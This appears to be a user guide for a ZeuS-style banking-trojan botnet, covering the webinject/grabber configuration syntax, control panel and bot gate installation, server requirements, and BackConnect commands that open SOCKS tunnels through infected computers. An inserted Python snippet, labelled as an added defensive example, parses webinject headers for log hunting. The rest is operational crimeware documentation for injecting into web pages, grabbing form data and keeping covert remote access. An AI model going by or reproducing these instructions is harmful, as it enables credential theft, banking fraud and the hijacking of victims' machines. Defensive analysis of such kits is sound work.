User guide

Description: Bot

Description: Control panel

Configuration file: HTTP-inject/HTTP-grabber.

For convenience, the HTTP-inject/HTTP-grabber entries are written in a separate file, whose name is specified in the configuration file as "DynamicConfig.file_webinjects". Once the final configuration file has been created, no additional files are generated.

The file consists of a list of URLs, for each of which you can specify an unlimited number of modifications to its content or of data items to extract from it. Each URL is introduced by a line of the following form:

set_url [url] [options] [postdata_blacklist] [postdata_whitelist] [url_block] [matched_context]

Parameters:

url - URL on which the HTTP-inject/HTTP-grabber must run. Masks are allowed (* and # symbols).
options - Defines the basic conditions for the entry; consists of a combination of the following characters:
  • P - runs on a POST-request.
  • G - runs on a GET-request.
  • L - if this symbol is specified, the entry runs as an HTTP-grabber; if not specified, it runs as an HTTP-inject.
  • D - blocks running more than once in 24 hours. This symbol requires the url_block parameter to be present.
  • F - complements the symbol "L"; records the result not in the full report but in a separate file "grabbed\%host%_%year%_%month%_%day%.txt".
  • H - complements the symbol "L"; saves the contents without stripping the HTML-tags. In normal mode, all HTML-tags are removed, and some are converted into a "new line" or "space" character.
  • I - compares the url parameter case-insensitively (English alphabet only).
  • C - compares the context case-insensitively (English alphabet only).
postdata_blacklist - Complete (from beginning to end) contents of the POST-data for which the entry should not run. Masks are allowed (* and ? symbols).

Parameter is optional.
postdata_whitelist - Complete (from beginning to end) contents of the POST-data for which the entry should run. Masks are allowed (* and ? symbols).

Parameter is optional.
url_block - In the absence of the symbol "D" in the options parameter:

If the run must occur only once, specify a URL here; once that URL is accessed, further runs are blocked. This URL is expected to be requested immediately after the HTTP-inject/HTTP-grabber has been applied. If a rerun is needed after blocking, the lock can be removed via the command "bot_httpinject_enable" with a parameter, for example, equal to the parameter url.

In the presence of the symbol "D" in the options parameter:

You must specify a URL; when it is accessed, the run is blocked for 24 hours. This URL is expected to be requested immediately after the HTTP-inject/HTTP-grabber has been applied. This lock cannot be removed by the command "bot_httpinject_enable".

Parameter is optional in the absence of the symbol "D" in the options parameter.
matched_context - Subcontent (substring) of the URL content for which the entry should run. Masks are allowed (* and ? symbols).

Parameter is optional.

The next line begins the list of changes to be made to the content of the URL or, if the symbol "L" is present in the options parameter, the list of data to be retrieved from the URL content. The list continues until the end of the file or until a new URL is specified.

Each list item consists of three elements, in any order:

data_before - In the absence of the symbol "L" in the options parameter:

Subcontent in the URL content, after which the new data is to be inserted.

In the presence of the symbol "L" in the options parameter:

Subcontent in the URL content, after which getting the data for the report starts.

Masks are allowed (* and ? symbols).
data_after - In the absence of the symbol "L" in the options parameter:

Subcontent in the URL content, before which the new data is to end.

In the presence of the symbol "L" in the options parameter:

Subcontent in the URL content, after which getting the data for the report must finish.

Masks are allowed (* and ? symbols).
data_inject - In the absence of the symbol "L" in the options parameter:

The new data that will be inserted between the data_before and data_after data.

In the presence of the symbol "L" in the options parameter:

Subcontent in the URL content, after which getting the data for the report must finish.
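
For analysts triaging a webinjects file recovered from a sample, the set_url header lines described above are enough to list which URL masks a configuration covers and whether each entry injects or grabs, and to check proxy logs for hosts that visited them. This is an added example, not part of the original guide; the function names, sample entries and example domains are constructed, and treating both * and # as "any run of characters" is an assumption, since the guide does not define them.

```python
import re

# Option letters exactly as the guide documents them for set_url.
FLAG_MEANING = {"P": "POST", "G": "GET", "L": "grabber", "D": "once-per-24h",
                "F": "separate-file", "H": "keep-html",
                "I": "url-nocase", "C": "context-nocase"}

def parse_set_url(text):
    """Return one dict per set_url line found in a recovered webinjects file."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 2 or parts[0] != "set_url":
            continue  # entry bodies and blank lines are not needed for triage
        opts = parts[2] if len(parts) > 2 else ""
        entries.append({
            "line": lineno,
            "url_mask": parts[1],
            "mode": "grabber" if "L" in opts else "inject",
            "flags": [FLAG_MEANING.get(c, "unknown:" + c) for c in opts],
            "nocase": "I" in opts,
        })
    return entries

def mask_to_regex(mask, nocase):
    # Assumption: '*' and '#' each match any run of characters.
    # Over-matching is acceptable when hunting through logs.
    pattern = ".*".join(re.escape(p) for p in re.split(r"[*#]", mask))
    return re.compile("^" + pattern + "$", re.I if nocase else 0)

def hunt(entries, visited_urls):
    """Return (url, mode, config line) for each logged URL covered by a mask."""
    hits = []
    for url in visited_urls:
        for e in entries:
            if mask_to_regex(e["url_mask"], e["nocase"]).match(url):
                hits.append((url, e["mode"], e["line"]))
    return hits

# Constructed sample: recovered header lines and proxy-log URLs (example domains).
SAMPLE_CONFIG = ("set_url https://portal.example/login* GP\n"
                 "(entry body omitted)\n"
                 "set_url http://mail.example/inbox# GLI\n")
SAMPLE_LOG = ["https://portal.example/login?next=/home",
              "http://MAIL.example/inbox7", "https://news.example/"]

if __name__ == "__main__":
    for hit in hunt(parse_set_url(SAMPLE_CONFIG), SAMPLE_LOG):
        print(hit)
```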

Example:

user_homepage_set http://www.google.com/ Force setting the homepage as "http://www.google.com/".
user_homepage_set Force setting the homepage will be disabled.
LIMITS LOGIC FOR INCOMPLETE before or after

Control panel: Server configuration

The server is the central point of control of the botnet; it collects reports from the bots and issues commands to them. It is not recommended to use "Virtual Hosting" or "VDS": as the botnet grows, the load on the server will increase, and this kind of web hosting quickly exhausts its resources. You need a "Dedicated Server" (Ded), the recommended minimum configuration:

For the bot to work, an HTTP-server with PHP + Zend Optimizer attached and a MySQL-server are required.
WARNING: For Windows-based servers it is very important to change (create) the following registry value: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\MaxUserPort=dword:65534 (decimal).

Control panel: Installation

Designation of files and folders:

/install - installer
/system - system files
/system/fsarc.php - script to call an external archiver
/system/config.php - configuration file
/theme - theme files (design), without Zend, can be changed freely
cp.php - control panel entrance
gate.php - gate for bots
index.php - empty file to prevent listing of files

The control panel is usually located in your distribution folder server[php]. All contents of this folder are to be uploaded to the server, to any location accessible via HTTP. If you upload it via FTP, all files must be uploaded in BINARY mode.

For nix-systems set rights:

/. - 777
/system - 777
/tmp - 777

For Windows-systems set rights:

\system - full rights for reading and writing for the unprivileged user which is used to access the files via HTTP. For IIS it is usually IUSR_*
\tmp - the same as for \system

Once all files are uploaded and the rights are set, run the installer in the browser from the URL http://server/directory/install/index.php. Follow the on-screen instructions. In case of errors in the installation process (you will be notified in detail), check the entered data and that the rights on the folders are set properly.

After installing, it is recommended to remove the install directory and to rename the files cp.php (control panel entrance) and gate.php (gate for bots) to any names you like (the extension cannot be changed).

Now you can safely enter the control panel by typing the URL of the renamed cp.php file in the browser.

Control panel: Update

If you have a newer copy of the control panel, and want to update an older version, you must do the following:

  1. Copy the files of the new panel in place of the old ones.
  2. Rename the files cp.php and gate.php to the real names you selected when you installed the old control panel.
  3. Just in case, re-set the directory rights as described in the Installation section.
  4. Run the installer through the browser at the URL http://server/directory/install/index.php, and follow the on-screen instructions. The installer may take quite a long time, because some of the tables with reports may be recreated.
  5. You can use the new control panel.

Control panel: The file /system/fsarc.php.

This file contains a function to call an external archiver. Currently, the archiver is used only in the module "Reports::Find in files" (reports_files), and is called to download files and folders as a single archive. By default it is configured for the Zip archiver, which is universal for both Windows and nix, so all you have to do is install this archiver on the system and grant the right to execute it. You can also edit this file to work with any archiver.

Download Zip: http://www.info-zip.org/Zip.html.

Control panel: Commands, used in scripts

Working with the BackConnect-server

Working with BackConnect, by example.

  1. Run the server application (zsbcs.exe or zsbcs64.exe) on a server that has its own IP-address on the Internet. For the application, specify the port on which it waits for a connection from the bot and the port to which the client application will connect. For example zsbcs.exe listen -cp:1080 -bp:4500, where 1080 - client port, 4500 - port for the bot.

  2. Send the bot the command "bot_bc_add socks 192.168.100.1 4500".

  3. Now you need to wait for a connection from the bot to the server; during this period, any attempt by the client application to connect will be ignored (the client will be disconnected). The sign that the bot has connected is the line "Accepted new conection from bot..." in the server console output.

  4. After the bot has connected, you can work with your client application, i.e. you simply connect to the server on the client port (in this case 1080). For example, if you gave the socks command, then on the client port you would expect a Socks-server.

  5. When you no longer need the BackConnect from the bot for a specific service, issue the command "bot_bc_remove socks 192.168.100.1 4500".

NOTES:

  1. You can specify any number of BackConnects (i.e. bot_bc_add), but they must not share the same combination of IP + Port. If there is such a combination, the one added first will run.
  2. For each BackConnect, you must run a separate server application.
  3. In case of disconnection (server down, bot dropped, etc.), the bot will reconnect to the server indefinitely (even after restarting the PC), until the BackConnect is removed (i.e. bot_bc_remove).
  4. As a service for bot_bc_add, you can use any open port at the address 127.0.0.1.
  5. The server application supports IPv6, but currently this support is not particularly relevant.
  6. You can launch the server application under Wine. Writing an equivalent ELF application is not currently scheduled.
  7. It is highly recommended to use popular ports (80, 8080, 443 etc.) for the bp port of the server application, i.e. other ports may be blocked by the provider that owns the bot.
  8. Different bots must not be connected to one and the same server port at the same time.
  9. This method of connection might be useful for bots which are outside the NAT, i.e. sometimes Windows firewall of providers may block the Internet connection.

F.A.Q.

Version history